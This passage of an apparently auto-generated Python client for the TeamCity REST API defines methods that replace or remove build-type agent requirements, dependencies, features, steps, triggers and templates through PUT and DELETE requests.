    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']
    params = locals()
    # Fold recognised keyword arguments into ``params``; reject unknown ones.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method remove_template" % key
            )
        params[key] = val
    del params['kwargs']
    # Both locators are mandatory.
    for required in ('bt_locator', 'template_locator'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling `remove_template`" % required)  # noqa: E501
    collection_formats = {}
    # Path placeholders; TeamCityObject values are reduced to their locator id.
    path_params = {}
    for py_name, wire_name in (('bt_locator', 'btLocator'),
                               ('template_locator', 'templateLocator')):
        if py_name in params:
            value = params[py_name]
            path_params[wire_name] = value.locator_id if isinstance(value, TeamCityObject) else value
    query_params = [('inlineSettings', params['inline_settings'])] if 'inline_settings' in params else []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/templates/{templateLocator}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_agent_requirement_with_http_info(self, bt_locator, agent_requirement_locator, **kwargs):  # noqa: E501
    """replace_agent_requirement  # noqa: E501

    Runs synchronously unless ``async_req=True`` is passed, in which case
    the request thread is returned instead of the result.
    >>> thread = api.__replace_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str agent_requirement_locator: (required)
    :param str fields:
    :param AgentRequirement body:
    :return: AgentRequirement
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['bt_locator', 'agent_requirement_locator', 'fields', 'body']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']
    params = locals()
    # Fold recognised keyword arguments into ``params``; reject unknown ones.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_agent_requirement" % key
            )
        params[key] = val
    del params['kwargs']
    # Both locators are mandatory.
    for required in ('bt_locator', 'agent_requirement_locator'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling `replace_agent_requirement`" % required)  # noqa: E501
    collection_formats = {}
    # Path placeholders; TeamCityObject values are reduced to their locator id.
    path_params = {}
    for py_name, wire_name in (('bt_locator', 'btLocator'),
                               ('agent_requirement_locator', 'agentRequirementLocator')):
        if py_name in params:
            value = params[py_name]
            path_params[wire_name] = value.locator_id if isinstance(value, TeamCityObject) else value
    query_params = [('fields', params['fields'])] if 'fields' in params else []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/agent-requirements/{agentRequirementLocator}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='AgentRequirement',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_agent_requirements_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """replace_agent_requirements  # noqa: E501

    Runs synchronously unless ``async_req=True`` is passed, in which case
    the request thread is returned instead of the result.
    >>> thread = api.__replace_agent_requirements_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :param AgentRequirements body:
    :return: AgentRequirements
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['bt_locator', 'fields', 'body']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']
    params = locals()
    # Fold recognised keyword arguments into ``params``; reject unknown ones.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_agent_requirements" % key
            )
        params[key] = val
    del params['kwargs']
    # The build-type locator is mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `replace_agent_requirements`")  # noqa: E501
    collection_formats = {}
    # Path placeholders; TeamCityObject values are reduced to their locator id.
    path_params = {}
    if 'bt_locator' in params:
        value = params['bt_locator']
        path_params['btLocator'] = value.locator_id if isinstance(value, TeamCityObject) else value
    query_params = [('fields', params['fields'])] if 'fields' in params else []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/agent-requirements', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='AgentRequirements',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_artifact_dep_with_http_info(self, bt_locator, artifact_dep_locator, **kwargs):  # noqa: E501
    """replace_artifact_dep  # noqa: E501

    Runs synchronously unless ``async_req=True`` is passed, in which case
    the request thread is returned instead of the result.
    >>> thread = api.__replace_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str artifact_dep_locator: (required)
    :param str fields:
    :param ArtifactDependency body:
    :return: ArtifactDependency
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['bt_locator', 'artifact_dep_locator', 'fields', 'body']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']
    params = locals()
    # Fold recognised keyword arguments into ``params``; reject unknown ones.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_artifact_dep" % key
            )
        params[key] = val
    del params['kwargs']
    # Both locators are mandatory.
    for required in ('bt_locator', 'artifact_dep_locator'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling `replace_artifact_dep`" % required)  # noqa: E501
    collection_formats = {}
    # Path placeholders; TeamCityObject values are reduced to their locator id.
    path_params = {}
    for py_name, wire_name in (('bt_locator', 'btLocator'),
                               ('artifact_dep_locator', 'artifactDepLocator')):
        if py_name in params:
            value = params[py_name]
            path_params[wire_name] = value.locator_id if isinstance(value, TeamCityObject) else value
    query_params = [('fields', params['fields'])] if 'fields' in params else []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/artifact-dependencies/{artifactDepLocator}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ArtifactDependency',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_artifact_deps_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """replace_artifact_deps  # noqa: E501

    Runs synchronously unless ``async_req=True`` is passed, in which case
    the request thread is returned instead of the result.
    >>> thread = api.__replace_artifact_deps_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :param ArtifactDependencies body:
    :return: ArtifactDependencies
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['bt_locator', 'fields', 'body']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']
    params = locals()
    # Fold recognised keyword arguments into ``params``; reject unknown ones.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_artifact_deps" % key
            )
        params[key] = val
    del params['kwargs']
    # The build-type locator is mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `replace_artifact_deps`")  # noqa: E501
    collection_formats = {}
    # Path placeholders; TeamCityObject values are reduced to their locator id.
    path_params = {}
    if 'bt_locator' in params:
        value = params['bt_locator']
        path_params['btLocator'] = value.locator_id if isinstance(value, TeamCityObject) else value
    query_params = [('fields', params['fields'])] if 'fields' in params else []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/artifact-dependencies', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ArtifactDependencies',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_feature_with_http_info(self, bt_locator, feature_id, **kwargs):  # noqa: E501
    """replace_feature  # noqa: E501

    Runs synchronously unless ``async_req=True`` is passed, in which case
    the request thread is returned instead of the result.
    >>> thread = api.__replace_feature_with_http_info(bt_locator, feature_id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str feature_id: (required)
    :param str fields:
    :param Feature body:
    :return: Feature
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['bt_locator', 'feature_id', 'fields', 'body']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']
    params = locals()
    # Fold recognised keyword arguments into ``params``; reject unknown ones.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_feature" % key
            )
        params[key] = val
    del params['kwargs']
    # Both identifiers are mandatory.
    for required in ('bt_locator', 'feature_id'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling `replace_feature`" % required)  # noqa: E501
    collection_formats = {}
    # Path placeholders; TeamCityObject values are reduced to their locator id.
    path_params = {}
    for py_name, wire_name in (('bt_locator', 'btLocator'),
                               ('feature_id', 'featureId')):
        if py_name in params:
            value = params[py_name]
            path_params[wire_name] = value.locator_id if isinstance(value, TeamCityObject) else value
    query_params = [('fields', params['fields'])] if 'fields' in params else []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/features/{featureId}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Feature',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_feature_parameters_with_http_info(self, bt_locator, feature_id, **kwargs):  # noqa: E501
    """replace_feature_parameters  # noqa: E501

    Runs synchronously unless ``async_req=True`` is passed, in which case
    the request thread is returned instead of the result.
    >>> thread = api.__replace_feature_parameters_with_http_info(bt_locator, feature_id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str feature_id: (required)
    :param Properties body:
    :param str fields:
    :return: Properties
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['bt_locator', 'feature_id', 'body', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']
    params = locals()
    # Fold recognised keyword arguments into ``params``; reject unknown ones.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_feature_parameters" % key
            )
        params[key] = val
    del params['kwargs']
    # Both identifiers are mandatory.
    for required in ('bt_locator', 'feature_id'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling `replace_feature_parameters`" % required)  # noqa: E501
    collection_formats = {}
    # Path placeholders; TeamCityObject values are reduced to their locator id.
    path_params = {}
    for py_name, wire_name in (('bt_locator', 'btLocator'),
                               ('feature_id', 'featureId')):
        if py_name in params:
            value = params[py_name]
            path_params[wire_name] = value.locator_id if isinstance(value, TeamCityObject) else value
    query_params = [('fields', params['fields'])] if 'fields' in params else []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/features/{featureId}/parameters', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Properties',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_features_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """replace_features  # noqa: E501

    Runs synchronously unless ``async_req=True`` is passed, in which case
    the request thread is returned instead of the result.
    >>> thread = api.__replace_features_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :param Features body:
    :return: Features
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['bt_locator', 'fields', 'body']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']
    params = locals()
    # Fold recognised keyword arguments into ``params``; reject unknown ones.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_features" % key
            )
        params[key] = val
    del params['kwargs']
    # The build-type locator is mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `replace_features`")  # noqa: E501
    collection_formats = {}
    # Path placeholders; TeamCityObject values are reduced to their locator id.
    path_params = {}
    if 'bt_locator' in params:
        value = params['bt_locator']
        path_params['btLocator'] = value.locator_id if isinstance(value, TeamCityObject) else value
    query_params = [('fields', params['fields'])] if 'fields' in params else []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/features', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Features',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_snapshot_dep_with_http_info(self, bt_locator, snapshot_dep_locator, **kwargs):  # noqa: E501
    """replace_snapshot_dep  # noqa: E501

    Runs synchronously unless ``async_req=True`` is passed, in which case
    the request thread is returned instead of the result.
    >>> thread = api.__replace_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str snapshot_dep_locator: (required)
    :param str fields:
    :param SnapshotDependency body:
    :return: SnapshotDependency
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['bt_locator', 'snapshot_dep_locator', 'fields', 'body']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']
    params = locals()
    # Fold recognised keyword arguments into ``params``; reject unknown ones.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_snapshot_dep" % key
            )
        params[key] = val
    del params['kwargs']
    # Both locators are mandatory.
    for required in ('bt_locator', 'snapshot_dep_locator'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling `replace_snapshot_dep`" % required)  # noqa: E501
    collection_formats = {}
    # Path placeholders; TeamCityObject values are reduced to their locator id.
    path_params = {}
    for py_name, wire_name in (('bt_locator', 'btLocator'),
                               ('snapshot_dep_locator', 'snapshotDepLocator')):
        if py_name in params:
            value = params[py_name]
            path_params[wire_name] = value.locator_id if isinstance(value, TeamCityObject) else value
    query_params = [('fields', params['fields'])] if 'fields' in params else []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/snapshot-dependencies/{snapshotDepLocator}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SnapshotDependency',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_snapshot_deps_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """replace_snapshot_deps  # noqa: E501

    Runs synchronously unless ``async_req=True`` is passed, in which case
    the request thread is returned instead of the result.
    >>> thread = api.__replace_snapshot_deps_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :param SnapshotDependencies body:
    :return: SnapshotDependencies
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['bt_locator', 'fields', 'body']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']
    params = locals()
    # Fold recognised keyword arguments into ``params``; reject unknown ones.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_snapshot_deps" % key
            )
        params[key] = val
    del params['kwargs']
    # The build-type locator is mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `replace_snapshot_deps`")  # noqa: E501
    collection_formats = {}
    # Path placeholders; TeamCityObject values are reduced to their locator id.
    path_params = {}
    if 'bt_locator' in params:
        value = params['bt_locator']
        path_params['btLocator'] = value.locator_id if isinstance(value, TeamCityObject) else value
    query_params = [('fields', params['fields'])] if 'fields' in params else []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/snapshot-dependencies', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SnapshotDependencies',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_step_with_http_info(self, bt_locator, step_id, **kwargs):  # noqa: E501
    """replace_step  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__replace_step_with_http_info(bt_locator, step_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str step_id: (required)
    :param str fields:
    :param Step body:
    :return: Step
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'step_id', 'fields', 'body']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator, 'step_id': step_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_step" % key
            )
        params[key] = val

    # Both path parameters are mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `replace_step`")  # noqa: E501
    if params.get('step_id') is None:
        raise ValueError("Missing the required parameter `step_id` when calling `replace_step`")  # noqa: E501

    collection_formats = {}

    # TeamCityObject instances are reduced to their locator ids.
    path_params = {}
    for wire_name, local_name in (('btLocator', 'bt_locator'),
                                  ('stepId', 'step_id')):
        value = params[local_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = params.get('body')

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/steps/{stepId}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Step',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_step_parameters_with_http_info(self, bt_locator, step_id, **kwargs):  # noqa: E501
    """replace_step_parameters  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__replace_step_parameters_with_http_info(bt_locator, step_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str step_id: (required)
    :param Properties body:
    :param str fields:
    :return: Properties
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'step_id', 'body', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator, 'step_id': step_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_step_parameters" % key
            )
        params[key] = val

    # Both path parameters are mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `replace_step_parameters`")  # noqa: E501
    if params.get('step_id') is None:
        raise ValueError("Missing the required parameter `step_id` when calling `replace_step_parameters`")  # noqa: E501

    collection_formats = {}

    # TeamCityObject instances are reduced to their locator ids.
    path_params = {}
    for wire_name, local_name in (('btLocator', 'bt_locator'),
                                  ('stepId', 'step_id')):
        value = params[local_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = params.get('body')

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/steps/{stepId}/parameters', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Properties',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_steps_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """replace_steps  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__replace_steps_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :param Steps body:
    :return: Steps
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'fields', 'body']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_steps" % key
            )
        params[key] = val

    # The path parameter is mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `replace_steps`")  # noqa: E501

    collection_formats = {}

    # A TeamCityObject is reduced to its locator id.
    path_params = {}
    locator = params['bt_locator']
    if isinstance(locator, TeamCityObject):
        locator = locator.locator_id
    path_params['btLocator'] = locator  # noqa: E501

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = params.get('body')

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/steps', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Steps',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_trigger_with_http_info(self, bt_locator, trigger_locator, **kwargs):  # noqa: E501
    """replace_trigger  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__replace_trigger_with_http_info(bt_locator, trigger_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str trigger_locator: (required)
    :param str fields:
    :param Trigger body:
    :return: Trigger
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'trigger_locator', 'fields', 'body']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator, 'trigger_locator': trigger_locator}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_trigger" % key
            )
        params[key] = val

    # Both path parameters are mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `replace_trigger`")  # noqa: E501
    if params.get('trigger_locator') is None:
        raise ValueError("Missing the required parameter `trigger_locator` when calling `replace_trigger`")  # noqa: E501

    collection_formats = {}

    # TeamCityObject instances are reduced to their locator ids.
    path_params = {}
    for wire_name, local_name in (('btLocator', 'bt_locator'),
                                  ('triggerLocator', 'trigger_locator')):
        value = params[local_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = params.get('body')

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/triggers/{triggerLocator}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Trigger',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_triggers_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """replace_triggers  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__replace_triggers_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :param Triggers body:
    :return: Triggers
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'fields', 'body']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_triggers" % key
            )
        params[key] = val

    # The path parameter is mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `replace_triggers`")  # noqa: E501

    collection_formats = {}

    # A TeamCityObject is reduced to its locator id.
    path_params = {}
    locator = params['bt_locator']
    if isinstance(locator, TeamCityObject):
        locator = locator.locator_id
    path_params['btLocator'] = locator  # noqa: E501

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = params.get('body')

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/triggers', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Triggers',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __replace_vcs_root_entries_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """replace_vcs_root_entries  # noqa: E501

    Performs a synchronous HTTP request unless ``async_req=True`` is
    passed, in which case the request thread is returned instead.

    >>> thread = api.__replace_vcs_root_entries_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param VcsRootEntries body:
    :param str fields:
    :return: VcsRootEntries
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['bt_locator', 'body', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = {'bt_locator': bt_locator}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method replace_vcs_root_entries" % key
            )
        params[key] = val

    # The path parameter is mandatory.
